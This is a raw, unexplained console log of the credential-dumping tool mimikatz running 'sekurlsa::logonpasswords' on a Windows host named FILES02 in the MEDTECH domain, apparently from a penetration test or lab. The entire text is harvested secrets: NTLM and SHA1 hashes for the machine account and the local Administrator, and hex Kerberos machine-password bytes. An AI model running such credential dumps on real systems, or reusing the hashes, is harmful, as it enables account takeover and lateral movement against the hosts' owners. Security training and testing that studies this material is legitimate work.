mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : FILES02$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 3/3/2025 7:48:00 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : FILES02$
         * Domain   : MEDTECH
         * NTLM     : 4f12ae502fd4be7ad21398dd4e045f40
         * SHA1     : 17218245b634c95282726583b1423a49264bec67
        tspkg :
        wdigest :
         * Username : FILES02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : files02$
         * Domain   : MEDTECH.COM
         * Password : c0 df c9 93 82 b8 39 25 96 79 e7 7f 04 e6 ca 30 5d 14 8a 81 12 39 df f5 25 8e af 0c bf 77 8b 29 db f0 cd 4b d8 48 1e e2 6d 07 74 e2 6d 12 fc 1a cc 58 52 09 b2 a6 c6 69 67 57 df c4 46 22 7e 3f 01 2d dd d3 60 74 6b 31 37 41 72 1a 75 45 58 6e 98 0c bf 91 4d 95 59 cd b9 46 86 57 48 51 0f df 4a de bd 7e d5 74 a1 a9 5c ad 0f f3 4d 69 2e 82 3c 0e 18 9f 79 29 d8 6b b3 ca 01 74 42 8f 13 db f6 02 35 ac 5e a0 a7 36 bd c1 ae 79 ad 82 e8 35 03 92 35 2b 2d 15 e9 fd a4 4b 12 5b f0 39 fc 5d d4 2f 84 d1 01 86 5a 71 ff 96 7a 19 86 7c 3c 38 8b 46 6d 5a 4c 5e d7 94 fe 36 f1 83 53 78 ea 1f 85 25 fe b2 1c 28 8d 92 3b 41 0a 8c 93 c1 ba e7 27 dc 09 5a 99 1f 20 a4 16 9c a0 36 6f df e6 c2 69 de ca 67 a3 16 1d cc 99 66 9d fc 71 40 77 24
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 36057 (00000000:00008cd9)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 3/3/2025 7:48:00 PM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : FILES02$
         * Domain   : MEDTECH
         * NTLM     : 4f12ae502fd4be7ad21398dd4e045f40
         * SHA1     : 17218245b634c95282726583b1423a49264bec67
        tspkg :
        wdigest :
         * Username : FILES02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : FILES02$
         * Domain   : medtech.com
         * Password : c0 df c9 93 82 b8 39 25 96 79 e7 7f 04 e6 ca 30 5d 14 8a 81 12 39 df f5 25 8e af 0c bf 77 8b 29 db f0 cd 4b d8 48 1e e2 6d 07 74 e2 6d 12 fc 1a cc 58 52 09 b2 a6 c6 69 67 57 df c4 46 22 7e 3f 01 2d dd d3 60 74 6b 31 37 41 72 1a 75 45 58 6e 98 0c bf 91 4d 95 59 cd b9 46 86 57 48 51 0f df 4a de bd 7e d5 74 a1 a9 5c ad 0f f3 4d 69 2e 82 3c 0e 18 9f 79 29 d8 6b b3 ca 01 74 42 8f 13 db f6 02 35 ac 5e a0 a7 36 bd c1 ae 79 ad 82 e8 35 03 92 35 2b 2d 15 e9 fd a4 4b 12 5b f0 39 fc 5d d4 2f 84 d1 01 86 5a 71 ff 96 7a 19 86 7c 3c 38 8b 46 6d 5a 4c 5e d7 94 fe 36 f1 83 53 78 ea 1f 85 25 fe b2 1c 28 8d 92 3b 41 0a 8c 93 c1 ba e7 27 dc 09 5a 99 1f 20 a4 16 9c a0 36 6f df e6 c2 69 de ca 67 a3 16 1d cc 99 66 9d fc 71 40 77 24
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 35156 (00000000:00008954)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 3/3/2025 7:47:59 PM
SID               :
        msv :
         [00000003] Primary
         * Username : FILES02$
         * Domain   : MEDTECH
         * NTLM     : 4f12ae502fd4be7ad21398dd4e045f40
         * SHA1     : 17218245b634c95282726583b1423a49264bec67
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 1297720 (00000000:0013cd38)
Session           : Batch from 0
User Name         : Administrator
Domain            : FILES02
Logon Server      : FILES02
Logon Time        : 3/3/2025 8:46:52 PM
SID               : S-1-5-21-617574027-3497765368-2664405491-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : FILES02
         * NTLM     : f1014ac49bae005ee3ece5f47547d185
         * SHA1     : 5e95d6c43e70e142df33af3b50ab0baa6ca02bad
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : FILES02
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : FILES02
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 3/3/2025 7:48:01 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 56376 (00000000:0000dc38)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/3/2025 7:48:01 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : FILES02$
         * Domain   : MEDTECH
         * NTLM     : 2d462881aa2d4b42cdeb0e7bc2f25a83
         * SHA1     : 93e02ca554b30cd4ef9f4ec369a3b8a7963b022a
        tspkg :
        wdigest :
         * Username : FILES02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : FILES02$
         * Domain   : medtech.com
         * Password : ed 45 13 bc cc d9 1f 61 20 67 29 5b c2 77 fb 99 a5 66 11 ca 52 dd bc a2 81 9d 95 00 35 8f fb 46 90 c3 2d 08 de f2 f3 d0 87 70 df e2 c6 ee 75 51 90 17 68 c1 49 12 a8 a1 b7 49 5e cf ab 83 81 b1 af 1e c4 a7 5f 89 71 aa bd dd a8 89 ae cf c1 91 8c 6d a9 86 c0 2a 46 65 25 97 8d ff 84 45 9d 04 3a 20 ad 99 66 73 61 75 82 88 87 4b 91 68 78 25 87 2a 47 48 c5 b5 b8 f9 5b 22 6b 98 6c 22 15 0d 2e c4 39 40 75 d5 14 b1 08 00 b3 b2 15 96 d4 ca 8e d6 d8 b4 7c 17 60 d7 fe 8b 2c 8d 53 4e a1 d8 46 76 75 27 26 75 2f 7f a5 3d ca 44 a5 a0 02 f3 bb c4 a6 4f ac 14 8d 4b ee ca 20 47 92 a0 7f 33 7c 91 5e 3a e6 3e 22 6f 85 72 02 13 3c 47 20 ce ef 2d 1f b0 e4 d4 f5 88 a8 72 f7 08 d4 d8 3c a1 b4 62 95 19 ed 86 c3 12 ea b0 bf ca c7 b6 83 96
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 56352 (00000000:0000dc20)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/3/2025 7:48:01 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : FILES02$
         * Domain   : MEDTECH
         * NTLM     : 4f12ae502fd4be7ad21398dd4e045f40
         * SHA1     : 17218245b634c95282726583b1423a49264bec67
        tspkg :
        wdigest :
         * Username : FILES02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : FILES02$
         * Domain   : medtech.com
         * Password : c0 df c9 93 82 b8 39 25 96 79 e7 7f 04 e6 ca 30 5d 14 8a 81 12 39 df f5 25 8e af 0c bf 77 8b 29 db f0 cd 4b d8 48 1e e2 6d 07 74 e2 6d 12 fc 1a cc 58 52 09 b2 a6 c6 69 67 57 df c4 46 22 7e 3f 01 2d dd d3 60 74 6b 31 37 41 72 1a 75 45 58 6e 98 0c bf 91 4d 95 59 cd b9 46 86 57 48 51 0f df 4a de bd 7e d5 74 a1 a9 5c ad 0f f3 4d 69 2e 82 3c 0e 18 9f 79 29 d8 6b b3 ca 01 74 42 8f 13 db f6 02 35 ac 5e a0 a7 36 bd c1 ae 79 ad 82 e8 35 03 92 35 2b 2d 15 e9 fd a4 4b 12 5b f0 39 fc 5d d4 2f 84 d1 01 86 5a 71 ff 96 7a 19 86 7c 3c 38 8b 46 6d 5a 4c 5e d7 94 fe 36 f1 83 53 78 ea 1f 85 25 fe b2 1c 28 8d 92 3b 41 0a 8c 93 c1 ba e7 27 dc 09 5a 99 1f 20 a4 16 9c a0 36 6f df e6 c2 69 de ca 67 a3 16 1d cc 99 66 9d fc 71 40 77 24
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 36058 (00000000:00008cda)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 3/3/2025 7:48:00 PM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : FILES02$
         * Domain   : MEDTECH
         * NTLM     : 4f12ae502fd4be7ad21398dd4e045f40
         * SHA1     : 17218245b634c95282726583b1423a49264bec67
        tspkg :
        wdigest :
         * Username : FILES02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : FILES02$
         * Domain   : medtech.com
         * Password : c0 df c9 93 82 b8 39 25 96 79 e7 7f 04 e6 ca 30 5d 14 8a 81 12 39 df f5 25 8e af 0c bf 77 8b 29 db f0 cd 4b d8 48 1e e2 6d 07 74 e2 6d 12 fc 1a cc 58 52 09 b2 a6 c6 69 67 57 df c4 46 22 7e 3f 01 2d dd d3 60 74 6b 31 37 41 72 1a 75 45 58 6e 98 0c bf 91 4d 95 59 cd b9 46 86 57 48 51 0f df 4a de bd 7e d5 74 a1 a9 5c ad 0f f3 4d 69 2e 82 3c 0e 18 9f 79 29 d8 6b b3 ca 01 74 42 8f 13 db f6 02 35 ac 5e a0 a7 36 bd c1 ae 79 ad 82 e8 35 03 92 35 2b 2d 15 e9 fd a4 4b 12 5b f0 39 fc 5d d4 2f 84 d1 01 86 5a 71 ff 96 7a 19 86 7c 3c 38 8b 46 6d 5a 4c 5e d7 94 fe 36 f1 83 53 78 ea 1f 85 25 fe b2 1c 28 8d 92 3b 41 0a 8c 93 c1 ba e7 27 dc 09 5a 99 1f 20 a4 16 9c a0 36 6f df e6 c2 69 de ca 67 a3 16 1d cc 99 66 9d fc 71 40 77 24
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : FILES02$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 3/3/2025 7:47:59 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : FILES02$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : files02$
         * Domain   : MEDTECH.COM
         * Password : c0 df c9 93 82 b8 39 25 96 79 e7 7f 04 e6 ca 30 5d 14 8a 81 12 39 df f5 25 8e af 0c bf 77 8b 29 db f0 cd 4b d8 48 1e e2 6d 07 74 e2 6d 12 fc 1a cc 58 52 09 b2 a6 c6 69 67 57 df c4 46 22 7e 3f 01 2d dd d3 60 74 6b 31 37 41 72 1a 75 45 58 6e 98 0c bf 91 4d 95 59 cd b9 46 86 57 48 51 0f df 4a de bd 7e d5 74 a1 a9 5c ad 0f f3 4d 69 2e 82 3c 0e 18 9f 79 29 d8 6b b3 ca 01 74 42 8f 13 db f6 02 35 ac 5e a0 a7 36 bd c1 ae 79 ad 82 e8 35 03 92 35 2b 2d 15 e9 fd a4 4b 12 5b f0 39 fc 5d d4 2f 84 d1 01 86 5a 71 ff 96 7a 19 86 7c 3c 38 8b 46 6d 5a 4c 5e d7 94 fe 36 f1 83 53 78 ea 1f 85 25 fe b2 1c 28 8d 92 3b 41 0a 8c 93 c1 ba e7 27 dc 09 5a 99 1f 20 a4 16 9c a0 36 6f df e6 c2 69 de ca 67 a3 16 1d cc 99 66 9d fc 71 40 77 24
        ssp :
        credman :
        cloudap :

